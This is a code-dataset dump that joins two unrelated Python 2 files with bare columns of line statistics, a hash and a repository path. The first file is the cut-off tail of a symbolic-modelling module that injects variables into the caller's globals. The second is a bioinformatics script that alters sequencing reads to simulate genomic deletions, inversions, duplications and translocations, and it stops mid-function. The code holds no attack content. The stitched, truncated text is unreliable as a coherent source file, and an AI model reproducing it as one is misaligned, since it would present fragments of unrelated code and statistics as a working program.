# frame = inspect.currentframe().f_back
# try:
# if not isinstance(s, list):
# s = re.split('\s|,', s)
# if latex_names <> None:
# sl = re.split(' ', latex_names)
# if len(sl)<> len(s):
# raise Exception, "You should supply one latex name per variable"
# res = []
# for i in range(len(s)):
# t = s[i]
# # skip empty stringG
# if not t:
# continue
# if latex_names != None:
# sym = Shock(t,0,latex_name=sl[i])
# elif t in names_dict:
# sym = Shock(t,0,latex_name=names_dict[t])
# else:
# sym = Shock(t,0)
# frame.f_globals[t] = sym
# res.append(sym)
# res = list(res)
# if len(res) == 0: # var('')
# res = []
# # otherwise var('a b ...')
# frame.f_globals['shocks'] = res
# return res
# finally:
# del frame
#
#def add_shocks(s,latex_names=None):
# """
# The same as set_shocks but doesn't replace the existing variables.
# """
# frame = inspect.currentframe().f_back
# try:
# if not isinstance(s, list):
# s = re.split('\s|,', s)
# if latex_names <> None:
# sl = re.split(' ', latex_names)
# if len(sl)<> len(s):
# raise Exception, "You should supply one latex name per variable"
# res = []
# for i in range(len(s)):
# t=s[i]
# # skip empty stringG
# if not t:
# continue
# if latex_names == None:
# sym = Shock(t,0)
# else:
# sym = Shock(t,0,latex_name=sl[i])
# frame.f_globals[t] = sym
# res.append(sym)
# res = list(res)
# if len(res) == 0: # var('')
# res = []
# # otherwise var('a b ...')
# frame.f_globals['shocks'] += res
# return res
# finally:
# del frame
#
#def set_parameters(s,names_dict={}):
# """Create S symbolic variable with the name *s*.
# -- a string, either a single variable name, or
# a space separated list of variable names, or
# a list of variable names.
# NOTE: The new variable is both returned and automatically injected into
# the parent's *global* namespace. It's recommended not to use "var" in
# library code, it is better to use symbols() instead.
# EXAMPLES:
# """
#
# frame = inspect.currentframe().f_back
# try:
# if not isinstance(s, list):
# s = re.split('\s|,', s)
# res = []
# for t in s:
# # skip empty stringG
# if not t:
# continue
# if t in names_dict:
# latex_name = names_dict[t]
# else:
# latex_name = None
# sym = Parameter(t,latex_name)
# frame.f_globals[t] = sym
# res.append(sym)
# res = list(res)
# if len(res) == 0: # var('')
# res = []
# # otherwise var('a b ...')
# frame.f_globals['parameters'] = res
# return res
# finally:
# del frame
#
#def add_parameters(s,latex_names=None):
# """
# The same as set_variables but doesn't replace the existing variables.
# """
#
# frame = inspect.currentframe().f_back
# try:
# if not isinstance(s, list):
# s = re.split('\s|,', s)
# if latex_names <> None:
# sl = re.split('\s|,', latex_names)
# if len(sl)<> len(s):
# raise Exception, "You should supply one latex name per variable"
# res = []
# for i in range(len(s)):
# t=s[i]
# # skip empty stringG
# if not t:
# continue
# if latex_names == None:
# sym = Parameter(t)
# else:
# sym = Parameter(t,latex_name=sl[i])
# frame.f_globals[t] = sym
# res.append(sym)
# res = list(res)
# if len(res) == 0: # var('')
# res = []
# # otherwise var('a b ...')
# if frame.f_globals.get('parameters'):
# frame.f_globals['parameters'].extend(res)
# else:
# frame.f_globals['parameters'] = res
# return res
# finally:
# del frame
#### new style #######
def def_variables(s):
"""
blabla
"""
frame = inspect.currentframe().f_back
try:
if isinstance(s,str):
s = re.split('\s|,', s)
res = []
for t in s:
# skip empty stringG
if not t:
continue
if t.count("@") > 0:
sym = IndexedSymbol(t,Variable)
t = t.strip('@')
else:
sym = Variable(t)
frame.f_globals[t] = sym
res.append(sym)
if frame.f_globals.get('variables_order'):
# we should avoid to declare symbols twice !
frame.f_globals['variables_order'].extend(res)
else:
frame.f_globals['variables_order'] = res
return res
finally:
del frame
def def_shocks(s):
"""
blabla
"""
frame = inspect.currentframe().f_back
try:
if isinstance(s,str):
s = re.split('\s|,', s)
res = []
for t in s:
# skip empty stringG
if not t:
continue
if t.count("@") > 0:
sym = IndexedSymbol(t,Shock)
t = t.strip('@')
else:
sym = Shock(t)
frame.f_globals[t] = sym
res.append(sym)
if frame.f_globals.get('shocks_order'):
# we should avoid to declare symbols twice !
frame.f_globals['shocks_order'].extend(res)
else:
frame.f_globals['shocks_order'] = res
return res
finally:
del frame
def def_parameters(s):
"""
blabla
"""
frame = inspect.currentframe().f_back
try:
if isinstance(s,str):
s = re.split('\s|,', s)
res = []
for t in s:
# skip empty stringG
if not t:
continue
if t.count("@") > 0:
sym = IndexedSymbol(t,Parameter)
t = t.strip('@')
else:
sym = Parameter(t)
frame.f_globals[t] = sym
res.append(sym)
if frame.f_globals.get('parameters_order'):
# we should avoid to declare symbols twice !
frame.f_globals['parameters_order'].extend(res)
else:
frame.f_globals['parameters_order'] = res
return res
finally:
del frame
def clear_all():
"""
Clears all parameters, variables, and shocks defined previously
"""
frame = inspect.currentframe().f_back
try:
if frame.f_globals.get('variables_order'):
# we should avoid to declare symbols twice !
del frame.f_globals['variables_order']
if frame.f_globals.get('parameters_order'):
# we should avoid to declare symbols twice !
del frame.f_globals['parameters_order']
finally:
del frame
def inject_symbols(symbs):
frame = inspect.currentframe().f_back
try:
for s in symbs:
sn = s.name
frame.f_globals[sn] = s
finally:
del frame
| 29.982558
| 81
| 0.496025
| 1,233
| 10,314
| 4.064071
| 0.101379
| 0.037118
| 0.080423
| 0.054879
| 0.908002
| 0.871084
| 0.848334
| 0.818799
| 0.798843
| 0.783676
| 0
| 0.002642
| 0.376091
| 10,314
| 343
| 82
| 30.069971
| 0.776068
| 0.679368
| 0
| 0.707865
| 0
| 0
| 0.069853
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05618
| false
| 0
| 0.033708
| 0
| 0.123596
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
507024300ad5db651ed84931b1bd16642f4463db
| 40,570
|
py
|
Python
|
varben/deal_sv/dealReadsType.py
|
yulijia/VarBen
|
a41491d6022822be8be3c5a0dd7e6e06987374cd
|
[
"MIT"
] | null | null | null |
varben/deal_sv/dealReadsType.py
|
yulijia/VarBen
|
a41491d6022822be8be3c5a0dd7e6e06987374cd
|
[
"MIT"
] | null | null | null |
varben/deal_sv/dealReadsType.py
|
yulijia/VarBen
|
a41491d6022822be8be3c5a0dd7e6e06987374cd
|
[
"MIT"
] | null | null | null |
import random
import re
import copy
from varben.common.methods import check_reads_pair, getComplementarySeq
try_max_time = 100
shift_num = 1000
def mend_read_part(ref, read, start, end, readsType, relPart, svtype="del",
subPos=None): # relPart: which has existed, for example: "left" means left existed, need mend right part
seq_len = len(read.query_sequence)
posPairList = read.get_aligned_pairs
svPosIndex = 0
if readsType == "type1" or readsType == "type6":
if relPart == "left":
for i, pair in enumerate(posPairList):
svPosIndex = pair[0]
if pair[1] >= start:
break
if svtype == "del":
pos_start = end + 1
pos_end = pos_start + seq_len - svPosIndex
mend_seq = ref.fetch(read.reference_name, pos_start, pos_end)
new_seq = read.query_sequence[:svPosIndex] + mend_seq
elif svtype == "inv":
pos_end = end + 1
pos_start = pos_end - (seq_len - svPosIndex)
mend_seq = ref.fetch(read.reference_name, pos_start, pos_end)
new_seq = read.query_sequence[:svPosIndex] + getComplementarySeq(mend_seq)[::-1]
elif svtype == "trans_balance" or svtype == "trans_chrom":
res = re.match("(\w*):(\d*)-(\d*)", subPos)
trans_chr, trans_start, trans_end = res.group(1), int(res.group(2)), int(res.group(3))
pos_start = trans_start
pos_end = pos_start + (seq_len - svPosIndex)
mend_seq = ref.fetch(trans_chr, pos_start, pos_end)
new_seq = read.query_sequence[:svPosIndex] + mend_seq
elif svtype == "trans_unbalance":
res = re.match("(\w*):(\d*)-(\d*)", subPos)
trans_chr, trans_start, trans_end = res.group(1), int(res.group(2)), int(res.group(3))
pos_start = trans_start
pos_end = pos_start + seq_len - (svPosIndex + 1)
mend_seq = ref.fetch(trans_chr, pos_start, pos_end)
new_seq = read.query_sequence[:svPosIndex + 1] + mend_seq
elif readsType == "type6" and svtype == "dup":
pos_end = end + 1
pos_start = pos_end - svPosIndex
mend_seq = ref.fetch(read.reference_name, pos_start, pos_end)
new_seq = mend_seq + read.query_sequence[svPosIndex:]
else:
for i, pair in enumerate(posPairList):
svPosIndex = pair[0]
if pair[1] >= end:
break
if svtype == "del":
pos_end = start - 1 + 1
pos_start = pos_end - (svPosIndex + 1)
mend_seq = ref.fetch(read.reference_name, pos_start, pos_end)
new_seq = mend_seq + read.query_sequence[svPosIndex + 1:]
elif svtype == "inv":
pos_start = start
pos_end = start + (svPosIndex + 1)
mend_seq = ref.fetch(read.reference_name, pos_start, pos_end)
new_seq = getComplementarySeq(mend_seq)[::-1] + read.query_sequence[svPosIndex + 1:]
elif svtype == "trans_balance":
res = re.match("(\w*):(\d*)-(\d*)", subPos)
trans_chr, trans_start, trans_end = res.group(1), int(res.group(2)), int(res.group(3))
pos_end = trans_end + 1
pos_start = pos_end - (svPosIndex + 1)
mend_seq = ref.fetch(trans_chr, pos_start, pos_end)
new_seq = mend_seq + read.query_sequence[svPosIndex + 1:]
elif readsType == "type6" and svtype == "dup":
pos_start = start
pos_end = pos_start + seq_len - (svPosIndex + 1)
mend_seq = ref.fetch(read.reference_name, pos_start, pos_end)
new_seq = read.query_sequence[:svPosIndex + 1] + mend_seq
elif readsType == "type6" and svtype == "trans_unbalance":
res = re.match("(\w*):(\d*)-(\d*)", subPos)
trans_chr, trans_start, trans_end = res.group(1), int(res.group(2)), int(res.group(3))
pos_end = end + 1
pos_start = pos_end - (svPosIndex + 1)
mend_seq = ref.fetch(trans_chr, pos_start, pos_end)
new_seq = mend_seq + read.query_sequence[svPosIndex + 1:]
elif readsType == "type2":
if relPart == "left":
for i, pair in enumerate(posPairList):
svPosIndex = pair[0]
if pair[1] >= start:
break
if svtype == "inv":
pos_start = end + 1
pos_end = pos_start + svPosIndex
mend_seq = ref.fetch(read.reference_name, pos_start, pos_end)
new_seq = getComplementarySeq(mend_seq)[::-1] + read.query_sequence[svPosIndex:]
elif svtype == "dup":
pos_end = end + 1
pos_start = pos_end - svPosIndex
mend_seq = ref.fetch(read.reference_name, pos_start, pos_end)
new_seq = mend_seq + read.query_sequence[svPosIndex:]
elif svtype == "trans_balance" or svtype == "trans_chrom":
res = re.match("(\w*):(\d*)-(\d*)", subPos)
trans_chr, trans_start, trans_end = res.group(1), int(res.group(2)), int(res.group(3))
pos_end = trans_start
pos_start = pos_end - svPosIndex
mend_seq = ref.fetch(trans_chr, pos_start, pos_end)
new_seq = mend_seq + read.query_sequence[svPosIndex:]
elif relPart == "right":
for i, pair in enumerate(posPairList):
svPosIndex = pair[0]
if pair[1] >= end:
break
if svtype == "inv":
pos_end = start
pos_start = pos_end - (seq_len - svPosIndex - 1)
mend_seq = ref.fetch(read.reference_name, pos_start, pos_end)
new_seq = read.query_sequence[:svPosIndex + 1] + getComplementarySeq(mend_seq)[::-1]
# print read.query_name, read.query_sequence, mend_seq, new_seq
elif svtype == "dup":
pos_start = start
pos_end = pos_start + seq_len - (svPosIndex + 1)
mend_seq = ref.fetch(read.reference_name, pos_start, pos_end)
new_seq = read.query_sequence[0:svPosIndex + 1] + mend_seq
elif svtype == "trans_balance":
res = re.match("(\w*):(\d*)-(\d*)", subPos)
trans_chr, trans_start, trans_end = res.group(1), int(res.group(2)), int(res.group(3))
pos_start = trans_end + 1
pos_end = pos_start + seq_len - (svPosIndex + 1)
mend_seq = ref.fetch(trans_chr, pos_start, pos_end)
new_seq = read.query_sequence[:svPosIndex + 1] + mend_seq
elif svtype == "trans_unbalance":
res = re.match("(\w*):(\d*)-(\d*)", subPos)
trans_chr, trans_start, trans_end = res.group(1), int(res.group(2)), int(res.group(3))
pos_end = trans_end + 1
pos_start = pos_end - svPosIndex
mend_seq = ref.fetch(trans_chr, pos_start, pos_end)
# print trans_chr, pos_start, pos_end
new_seq = mend_seq + read.query_sequence[svPosIndex:]
elif readsType == "type5":
if relPart == "left":
for i, pair in enumerate(posPairList):
svPosIndex = pair[0]
if pair[1] >= start:
break
if svtype == "del":
pos_start = end + 1
pos_end = pos_start + seq_len - svPosIndex
mend_seq = ref.fetch(read.reference_name, pos_start, pos_end)
new_seq = read.query_sequence[:svPosIndex] + mend_seq
elif svtype == "dup":
pos_end = end + 1
pos_start = pos_end - svPosIndex
mend_seq = ref.fetch(read.reference_name, pos_start, pos_end)
new_seq = mend_seq + read.query_sequence[svPosIndex:]
elif svtype == "trans_balance" or svtype == "trans_chrom":
res = re.match("(\w*):(\d*)-(\d*)", subPos)
trans_chr, trans_start, trans_end = res.group(1), int(res.group(2)), int(res.group(3))
pos_start = trans_start
pos_end = pos_start + (seq_len - svPosIndex)
mend_seq = ref.fetch(trans_chr, pos_start, pos_end)
new_seq = read.query_sequence[:svPosIndex] + mend_seq
elif svtype == "trans_unbalance":
res = re.match("(\w*):(\d*)-(\d*)", subPos)
trans_chr, trans_start, trans_end = res.group(1), int(res.group(2)), int(res.group(3))
pos_start = trans_start
pos_end = pos_start + seq_len - (svPosIndex + 1)
mend_seq = ref.fetch(trans_chr, pos_start, pos_end)
new_seq = read.query_sequence[:svPosIndex + 1] + mend_seq
elif svtype == "inv":
pos_end = end + 1
pos_start = pos_end - (seq_len - svPosIndex)
mend_seq = ref.fetch(read.reference_name, pos_start, pos_end)
new_seq = read.query_sequence[:svPosIndex] + getComplementarySeq(mend_seq)[::-1]
elif relPart == "right":
for i, pair in enumerate(posPairList):
svPosIndex = pair[0]
if pair[1] >= end:
break
if svtype == "dup":
pos_start = start
pos_end = pos_start + seq_len - (svPosIndex + 1)
mend_seq = ref.fetch(read.reference_name, pos_start, pos_end)
new_seq = read.query_sequence[0:svPosIndex + 1] + mend_seq
elif svtype == "trans_balance":
res = re.match("(\w*):(\d*)-(\d*)", subPos)
trans_chr, trans_start, trans_end = res.group(1), int(res.group(2)), int(res.group(3))
pos_end = trans_end + 1
pos_start = pos_end - (svPosIndex + 1)
mend_seq = ref.fetch(trans_chr, pos_start, pos_end)
new_seq = mend_seq + read.query_sequence[svPosIndex + 1:]
elif svtype == "trans_unbalance":
res = re.match("(\w*):(\d*)-(\d*)", subPos)
trans_chr, trans_start, trans_end = res.group(1), int(res.group(2)), int(res.group(3))
pos_end = trans_end + 1
pos_start = pos_end - svPosIndex
mend_seq = ref.fetch(trans_chr, pos_start, pos_end)
new_seq = mend_seq + read.query_sequence[svPosIndex:]
elif svtype == "inv":
pos_start = start
pos_end = start + (svPosIndex + 1)
mend_seq = ref.fetch(read.reference_name, pos_start, pos_end)
new_seq = getComplementarySeq(mend_seq)[::-1] + read.query_sequence[svPosIndex + 1:]
# if len(new_seq) != seq_len:
# print readsType, relPart, svtype
return new_seq
def deal_type1(ref, reads_type1_left, reads_type1_right, freq, start, end, svtype, subPos=None):
# fix up
print "deal type1 start......"
reads_left_num = len(reads_type1_left)
reads_right_num = len(reads_type1_right)
reads_left_mend_id = random_mendIDList(reads_left_num, freq)
reads_right_mend_id = random_mendIDList(reads_right_num, freq)
total_reads = []
for read_pair_id in reads_left_mend_id:
read_pair = reads_type1_left[read_pair_id]
read = read_pair[1]
read_mate = read_pair[0]
new_seq = mend_read_part(ref, read, start, end, "type1", "left", svtype, subPos)
qual = read.query_qualities
read.query_sequence = new_seq
read.query_qualities = qual
total_reads.append([read_mate, read])
for read_pair_id in reads_right_mend_id:
read_pair = reads_type1_right[read_pair_id]
read = read_pair[0]
read_mate = read_pair[1]
new_seq = mend_read_part(ref, read, start, end, "type1", "right", svtype, subPos)
qual = read.query_qualities
read.query_sequence = new_seq
read.query_qualities = qual
total_reads.append([read, read_mate])
print "deal type1 end......"
return total_reads
def deal_type2(ref, reads_type2_left, reads_type2_right, freq, start, end, svtype, subPos=None):
print "deal type2 start......"
reads_left_num = len(reads_type2_left)
reads_right_num = len(reads_type2_right)
reads_left_mend_id = random_mendIDList(reads_left_num, freq)
reads_right_mend_id = random_mendIDList(reads_right_num, freq)
total_reads = []
if svtype == "del":
for read_pair_id in reads_left_mend_id:
total_reads.append(reads_type2_left[read_pair_id])
for read_pair_id in reads_right_mend_id:
total_reads.append(reads_type2_right[read_pair_id])
elif svtype == "inv":
for read_pair_id in reads_left_mend_id:
read_pair = reads_type2_left[read_pair_id]
read = read_pair[0]
read_mate = read_pair[1]
new_seq = mend_read_part(ref, read, start, end, "type2", "left", svtype)
qual = read.query_qualities
read.query_sequence = new_seq
read.query_qualities = qual
total_reads.append([read, read_mate])
for read_pair_id in reads_right_mend_id:
read_pair = reads_type2_right[read_pair_id]
read = read_pair[1]
read_mate = read_pair[0]
new_seq = mend_read_part(ref, read, start, end, "type2", "right", svtype)
qual = read.query_qualities
read.query_sequence = new_seq
read.query_qualities = qual
total_reads.append([read_mate, read])
elif svtype == "dup":
for read_pair_id in reads_left_mend_id:
read_pair = reads_type2_left[read_pair_id]
read = read_pair[0]
new_seq = mend_read_part(ref, read, start, end, "type2", "left", svtype)
qual = read.query_qualities
read.query_sequence = new_seq
read.query_qualities = qual
read2 = read_pair[1]
total_reads.append([read, read2])
for read_pair_id in reads_right_mend_id:
read_pair = reads_type2_right[read_pair_id]
read2 = read_pair[1]
new_seq = mend_read_part(ref, read2, start, end, "type2", "right", svtype)
qual = read2.query_qualities
read2.query_sequence = new_seq
read2.query_qualities = qual
read = read_pair[0]
total_reads.append([read, read2])
elif svtype == "trans_unbalance":
for read_pair_id in reads_right_mend_id:
read_pair = reads_type2_right[read_pair_id]
read = read_pair[0]
new_seq = mend_read_part(ref, read, start, end, "type2", "right", svtype, subPos=subPos)
qual = read.query_qualities
read.query_sequence = new_seq
read.query_qualities = qual
read2 = read_pair[1]
total_reads.append([read, read2])
elif svtype == "trans_balance":
for read_pair_id in reads_left_mend_id:
read_pair = reads_type2_left[read_pair_id]
read = read_pair[0]
new_seq = mend_read_part(ref, read, start, end, "type2", "left", svtype, subPos=subPos)
qual = read.query_qualities
read.query_sequence = new_seq
read.query_qualities = qual
read2 = read_pair[1]
total_reads.append([read, read2])
for read_pair_id in reads_right_mend_id:
read_pair = reads_type2_right[read_pair_id]
read2 = read_pair[1]
new_seq = mend_read_part(ref, read2, start, end, "type2", "right", svtype, subPos=subPos)
qual = read2.query_qualities
read2.query_sequence = new_seq
read2.query_qualities = qual
read = read_pair[0]
total_reads.append([read, read2])
elif svtype == "trans_chrom":
for read_pair_id in reads_left_mend_id:
read_pair = reads_type2_left[read_pair_id]
read = read_pair[0]
new_seq = mend_read_part(ref, read, start, end, "type2", "left", svtype, subPos=subPos)
qual = read.query_qualities
read.query_sequence = new_seq
read.query_qualities = qual
read2 = read_pair[1]
total_reads.append([read, read2])
print "deal type2 end......"
return total_reads
def deal_type3(reads_type3_left, reads_type3_right, freq, insertSize, start, end, svtype, supple1=None, supple2=None,
subPos=None):
# choose left read of start and right of end
print "deal type3 start......"
reads_left_num = len(reads_type3_left)
reads_right_num = len(reads_type3_right)
print reads_left_num, reads_right_num
reads_left_mend_id = random_mendIDList(reads_left_num, freq)
reads_right_mend_id = random_mendIDList(reads_right_num, freq)
total_del_reads = []
total_add_reads = []
total_modify_reads = []
if svtype == "del":
if len(supple1) == 0:
print "Step3: Warning! No corresponding reads to pair"
return [], [], []
for read_pair_id in reads_left_mend_id:
read_pair = reads_type3_left[read_pair_id]
read = read_pair[0]
try_time = 0
while True:
read_pair_tmp = random.sample(supple1, 1)[0]
read_right = read_pair_tmp[1]
insertSize_tmp = read_right.reference_end - read.reference_start - (end - start + 1)
# print insertSize, insertSize_tmp
if insertSize[0] <= insertSize_tmp <= insertSize[1] and check_reads_pair(read, read_right):
new_read = read_right
total_modify_reads.append([read, new_read])
total_del_reads.append([read_pair_tmp[0], read_pair[1]])
x = "\t".join(
[read.reference_name, str(read.reference_start), str(read.reference_end), str(read.is_read1)])
y = "\t".join([new_read.reference_name, str(new_read.reference_start), str(new_read.reference_end),
str(new_read.is_read1)])
print(x + "; " + y)
break
try_time += 1
if try_time > try_max_time:
print "can't find a mate read to match!"
break
if svtype == "dup":
if len(supple1) == 0:
print "Step3: Warning! No corresponding reads to pair"
return [], [], []
for read_pair_id in reads_left_mend_id:
read_pair = reads_type3_left[read_pair_id]
read = read_pair[1]
try_time = 0
while True:
read_left = random.sample(supple1, 1)[0][0]
insertSize_tmp = end - read_left.reference_start + read.reference_end - start + 1
if insertSize[0] <= insertSize_tmp <= insertSize[1] and check_reads_pair(read_left, read):
new_read = read_left
total_add_reads.append([read, new_read])
# x = "\t".join(
# [read.reference_name, str(read.reference_start), str(read.reference_end), str(read.is_read1)])
# y = "\t".join([new_read.reference_name, str(new_read.reference_start), str(new_read.reference_end),
# str(new_read.is_read1)])
# print(x + "; " + y)
break
try_time += 1
if try_time > try_max_time:
print "can't find a mate read to match!"
break
elif svtype == "inv":
#if len(reads_type4) == 0:
# print "Step3: Warning! No corresponding reads to pair"
# return [], [], []
# print 'inv', len(reads_left_mend_id)
if len(reads_type3_left) == 0 or len(reads_type3_right) == 0:
print "Step3: Warning! No corresponding reads to pair"
return [], [], []
for read_pair_id in reads_left_mend_id:
read_pair = reads_type3_left[read_pair_id]
read = read_pair[0]
try_time = 0
while True:
read_pair_tmp = copy.deepcopy(random.sample(reads_type3_right, 1)[0])
read_left = read_pair_tmp[0]
insertSize_tmp = start - read.reference_start + end - read_left.reference_start + 1
if insertSize[0] <= insertSize_tmp <= insertSize[1] and check_reads_pair(read,
read_left): ### reverse information?!!!
new_read = read_left
qual = new_read.query_qualities
new_read.query_sequence = getComplementarySeq(new_read.query_sequence)[::-1]
new_read.query_qualities = qual[::-1]
total_modify_reads.append([read, new_read])
init_right = read_pair[1]
qual2 = init_right.query_qualities
init_right.query_sequence = getComplementarySeq(init_right.query_sequence)[::-1]
init_right.query_qualities = qual2[::-1]
total_modify_reads.append([init_right, read_pair_tmp[1]])
x = "\t".join(
[read.reference_name, str(read.reference_start), str(read.reference_end), str(read.is_read1)])
y = "\t".join([new_read.reference_name, str(new_read.reference_start), str(new_read.reference_end),
str(new_read.is_read1)])
print(x + "; " + y)
break
try_time += 1
if try_time > try_max_time:
print "can't find a mate read to match!"
break
for read_pair_id in reads_right_mend_id:
read_pair = reads_type3_right[read_pair_id]
read = read_pair[1]
try_time = 0
while True:
read_pair_tmp = copy.deepcopy(random.sample(reads_type3_left, 1)[0])
read_right = read_pair_tmp[1]
insertSize_tmp = read_right.reference_end - start + read.reference_end - end + 1
if insertSize[0] <= insertSize_tmp <= insertSize[1] and check_reads_pair(read_right, read):
new_read = read_right
qual = new_read.query_qualities
new_read.query_sequence = getComplementarySeq(new_read.query_sequence)[::-1]
new_read.query_qualities = qual[::-1]
total_modify_reads.append([new_read, read])
init_left = read_pair[0]
qual2 = init_left.query_qualities
init_left.query_sequence = getComplementarySeq(init_left.query_sequence)[::-1]
init_left.query_qualities = qual2[::-1]
total_modify_reads.append([read_pair_tmp[0], init_left])
break
try_time += 1
if try_time > try_max_time:
print "can't find a mate read to match!"
break
elif svtype == "trans_balance":
reads_left_sub, reads_right_sub = supple1, supple2
res = re.match("(\w*):(\d*)-(\d*)", subPos)
trans_chr, trans_start, trans_end = res.group(1), int(res.group(2)), int(res.group(3))
if len(reads_left_sub) == 0 or len(reads_right_sub) == 0:
print "Step3: Warning! No corresponding reads to pair"
return [], [], []
for read_pair_id in reads_left_mend_id:
read_pair = reads_type3_left[read_pair_id]
read = read_pair[0]
try_time = 0
while True:
read_pair_tmp = random.sample(reads_left_sub, 1)[0]
read_right = read_pair_tmp[1]
insertSize_tmp = start - read.reference_start + read_right.reference_end - trans_start + 1
if insertSize[0] <= insertSize_tmp <= insertSize[1] and check_reads_pair(read, read_right):
new_read = read_right
total_modify_reads.append([read, new_read])
total_modify_reads.append([read_pair_tmp[0], read_pair[1]])
break
try_time += 1
if try_time > try_max_time:
print "can't find a mate read to match!"
break
for read_pair_id in reads_right_mend_id:
read_pair = reads_type3_right[read_pair_id]
read = read_pair[1]
try_time = 0
while True:
read_pair_tmp = random.sample(reads_right_sub, 1)[0]
read_left = read_pair_tmp[0]
insertSize_tmp = trans_end - read_left.reference_start + read.reference_end - end + 1
if insertSize[0] <= insertSize_tmp <= insertSize[1] and check_reads_pair(read_left, read):
new_read = read_left
total_modify_reads.append([new_read, read])
total_modify_reads.append([read_pair[0], read_pair_tmp[1]])
break
try_time += 1
if try_time > try_max_time:
print "can't find a mate read to match!"
break
elif svtype == "trans_chrom":
reads_left_sub, reads_right_sub = supple1, supple2
res = re.match("(\w*):(\d*)-(\d*)", subPos)
trans_chr, trans_start, trans_end = res.group(1), int(res.group(2)), int(res.group(3))
if len(reads_left_sub) == 0:
print "Step3: Warning! No corresponding reads to pair"
return [], [], []
for read_pair_id in reads_left_mend_id:
read_pair = reads_type3_left[read_pair_id]
read = read_pair[0]
try_time = 0
while True:
read_pair_tmp = random.sample(reads_left_sub, 1)[0]
read_right = read_pair_tmp[1]
insertSize_tmp = start - read.reference_start + read_right.reference_end - trans_start + 1
if insertSize[0] <= insertSize_tmp <= insertSize[1] and check_reads_pair(read, read_right):
new_read = read_right
total_modify_reads.append([read, new_read])
total_modify_reads.append([read_pair_tmp[0], read_pair[1]])
x = "\t".join(
[read.reference_name, str(read.reference_start), str(read.reference_end), str(read.is_read1)])
y = "\t".join([new_read.reference_name, str(new_read.reference_start), str(new_read.reference_end),
str(new_read.is_read1)])
print(x + "; " + y)
break
try_time += 1
if try_time > try_max_time:
print "can't find a mate read to match!"
break
elif svtype == "trans_unbalance":
reads_left_sub, reads_right_sub = supple1, supple2
res = re.match("(\w*):(\d*)-(\d*)", subPos)
trans_chr, trans_start, trans_end = res.group(1), int(res.group(2)), int(res.group(3))
if len(reads_left_sub) == 0 or len(reads_right_sub) == 0:
print "Step3: Warning! No corresponding reads to pair"
return [], [], []
for read_pair_id in reads_left_mend_id:
read_pair = reads_type3_left[read_pair_id]
read = read_pair[0]
try_time = 0
while True:
read_pair_tmp = random.sample(reads_left_sub, 1)[0]
read_right = read_pair_tmp[1]
insertSize_tmp = start - read.reference_start + read_right.reference_end - trans_start + 1
if insertSize[0] <= insertSize_tmp <= insertSize[1] and check_reads_pair(read,
read_right): # reverse information?!!!
new_read = read_right
total_modify_reads.append([read, new_read])
total_modify_reads.append([read_pair_tmp[0], read_pair[1]])
break
try_time += 1
if try_time > try_max_time:
print "can't find a mate read to match!"
break
for read_pair_id in reads_right_mend_id: # use left again, because right is none
read_pair = reads_type3_right[read_pair_id]
read = read_pair[1]
try_time = 0
while True:
read_pair_tmp = random.sample(reads_right_sub, 1)[0]
read_left = read_pair_tmp[0]
insertSize_tmp = trans_end - read_left.reference_start + read.reference_end - end + 1
if insertSize[0] <= insertSize_tmp <= insertSize[1] and check_reads_pair(read_left, read):
new_read = read_left
total_modify_reads.append([new_read, read])
total_modify_reads.append([read_pair[0], read_pair_tmp[1]])
break
try_time += 1
if try_time > try_max_time:
print "can't find a mate read to match!"
break
print "deal type3 end......"
return total_modify_reads, total_add_reads, total_del_reads
def deal_type4(reads_type4, freq, svtype, insertSize=None, cnvType=None):
print "deal type4 start......"
reads_num = len(reads_type4)
reads_mend_id = random_mendIDList(reads_num, freq)
total_reads = []
if svtype == "del" or (svtype == "cnv" and cnvType == "loss"):
for read_pair_id in reads_mend_id:
total_reads.append(reads_type4[read_pair_id])
elif svtype == "inv":
total_reads = []
elif svtype == "trans_balance":
total_reads = []
elif svtype == "dup" or (svtype == "cnv" and cnvType == "gain") or svtype == "trans_unbalance":
reads_mend_left_id = random_mendIDList(reads_num / 2, freq)
print "left mend count", len(reads_mend_left_id)
for read_pair_id in reads_mend_left_id:
# print read_pair_id
read_pair = reads_type4[read_pair_id]
read = read_pair[0]
# print read.reference_start
try_time = 0
while True:
read_right_pair_id = random.randint(read_pair_id + 1, min(read_pair_id + shift_num, reads_num - 1))
read_right = reads_type4[read_right_pair_id][1]
if read_right.query_name == read.query_name:
continue
insertSize_tmp = read_right.reference_end - read.reference_start + 1
if insertSize[0] <= insertSize_tmp <= insertSize[1] and check_reads_pair(read, read_right):
new_read = read_right
total_reads.append([read, new_read])
break
try_time += 1
if try_time > try_max_time:
print "can't find a mate read to match!"
break
# print "out loop1"
reads_mend_right_id = [reads_num / 2 + i for i in random_mendIDList(reads_num - reads_num / 2, freq)]
print "right mend count", len(reads_mend_right_id)
for read_pair_id in reads_mend_right_id:
# print read_pair_id
read_pair = reads_type4[read_pair_id]
read = read_pair[1]
try_time = 0
while True:
read_left_pair_id = random.randint(max(read_pair_id - shift_num, 0), read_pair_id - 1)
read_left = reads_type4[read_left_pair_id][0]
if read_left.query_name == read.query_name:
continue
insertSize_tmp = read.reference_end - read_left.reference_start + 1
if insertSize[0] <= insertSize_tmp <= insertSize[1] and check_reads_pair(read_left, read):
new_read = read_left
total_reads.append([new_read, read])
break
try_time += 1
if try_time > try_max_time:
print "can't find a mate read to match!"
break
print "deal type4 end......"
return total_reads
def deal_type5(ref, reads_type5_left, reads_type5_right, freq, start, end, svtype, supple1=None, supple2=None,
subPos=None):
print "deal type5 start......"
reads_left_num = len(reads_type5_left)
reads_right_num = len(reads_type5_right)
reads_left_mend_id = random_mendIDList(reads_left_num, freq)
reads_right_mend_id = random_mendIDList(reads_right_num, freq)
total_reads = []
if svtype == "del":
for read_pair_id in reads_left_mend_id:
read_pair = reads_type5_left[read_pair_id]
read_left = read_pair[0]
read_right = read_pair[1]
new_seq_left = mend_read_part(ref, read_left, start, end, "type5", "left", svtype)
new_seq_right = mend_read_part(ref, read_right, start, end, "type5", "left", svtype)
qual_left = read_left.query_qualities
qual_right = read_right.query_qualities
read_left.query_sequence = new_seq_left
read_right.query_sequence = new_seq_right
read_left.query_qualities = qual_left
read_right.query_qualities = qual_right
total_reads.append([read_left, read_right])
